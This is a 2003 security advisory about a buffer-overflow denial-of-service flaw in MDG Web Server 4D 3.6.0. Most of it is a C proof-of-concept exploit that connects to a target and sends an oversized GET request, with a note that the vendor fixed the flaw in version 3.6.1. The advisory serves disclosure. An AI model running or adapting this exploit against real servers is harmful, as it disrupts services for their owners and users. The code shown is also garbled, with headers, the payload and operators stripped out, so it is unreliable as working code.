Denial of Service (DoS) in MDG Web Server 4D Version 3.6.0

A Denial of Service (DoS) vulnerability in MDG Web Server 4D 3.6.0 can result in the execution of arbitrary code on the vulnerable system.

Ken Pfeil

May 6, 2003

3 Min Read
ITPro Today logo in a gray background | ITPro Today

Reported April 30, 2003, by Tom Ferris.

 

 

VERSIONS AFFECTED

 

  • MDG Web Server 4D 3.6.0

 

DESCRIPTION

 

A Denial of Service (DoS) vulnerability in MDG Web Server 4D 3.6.0 can result in the execution of arbitrary code on the vulnerable system. This vulnerability stems from a buffer-overflow condition. By issuing a GET / request with 4096 caret brackets (

 

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 
/* Web Server 4D 3.6.0 DoS
 *
 * Vulnerable systems:
 * Web Server 4D 3.6.0 DoS
 * Vendor:
 * http://www.mdg.com/
 *
 * Download it here:
 * ftp://ftp.mdg.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe
 *
 * Written and found by badpack3t
 * For SP Research Labs
 * 04/29/2003
 *
 * www.security-protocols.com
 *
 * usage:
 * sp-ws4d [targetport] (default is 80)
 */
 
#include
#include
 
#pragma comment(lib, "ws2_32.lib")
 
char exploit[] =
 
"GET /
"
"
"
"
"
"
 
 
int main(int argc, char *argv[])
{
      WSADATA wsaData;
      WORD wVersionRequested;
      struct hostent          *pTarget;
      struct sockaddr_in      sock;
      char *target, buffer[30000];
      int port,bufsize;
      SOCKET mysocket;
      if (argc
      {
            printf("Web Server 4D 3.6.0 DoSr rr", argv[0]);
            printf("Tool Usage:r %s [targetport] (default is 80)rr", argv[0]);
            printf("www.security-protocols.comrr", argv[0]);
            exit(1);
      }
 
      wVersionRequested = MAKEWORD(1, 1);
      if (WSAStartup(wVersionRequested, &wsaData)
 
      target = argv[1];
 
      //for default web attacks
      port = 80;
 
      if (argc >= 3) port = atoi(argv[2]);
      bufsize = 512;
      if (argc >= 4) bufsize = atoi(argv[3]);
 
      mysocket = socket(AF_INET, SOCK_STREAM, 0);
      if(mysocket
INVALID_SOCKET)
      {    
            printf("Socket error!r");
            exit(1);
      }
 
      printf("Resolving Hostnames...");
      if ((pTarget = gethostbyname(target)) NULL)
      {
            printf("Resolve of %s failed", argv[1]);
            exit(1);
      }
 
      memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
      sock.sin_family = AF_INET;
      sock.sin_port = htons((USHORT)port);
 
      printf("Connecting...");
      if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
      {
            printf("Couldn't connect to host.");
            exit(1);
      }
 
      printf("Connected!...");
      printf("Sending Payload...");
      if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
      {
            printf("Error Sending the Exploit Payloadr");
            closesocket(mysocket);
            exit(1);
      }
 
      printf("Remote Webserver has been DoS'ed r");
      closesocket(mysocket);
      WSACleanup();
      return 0;
}

 

VENDOR RESPONSE

 

MDG has released version 3.6.1 of the product. The vendor reports that this version is no longer vulnerable.

 

CREDI

 

Discovered byTom Ferris.

Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like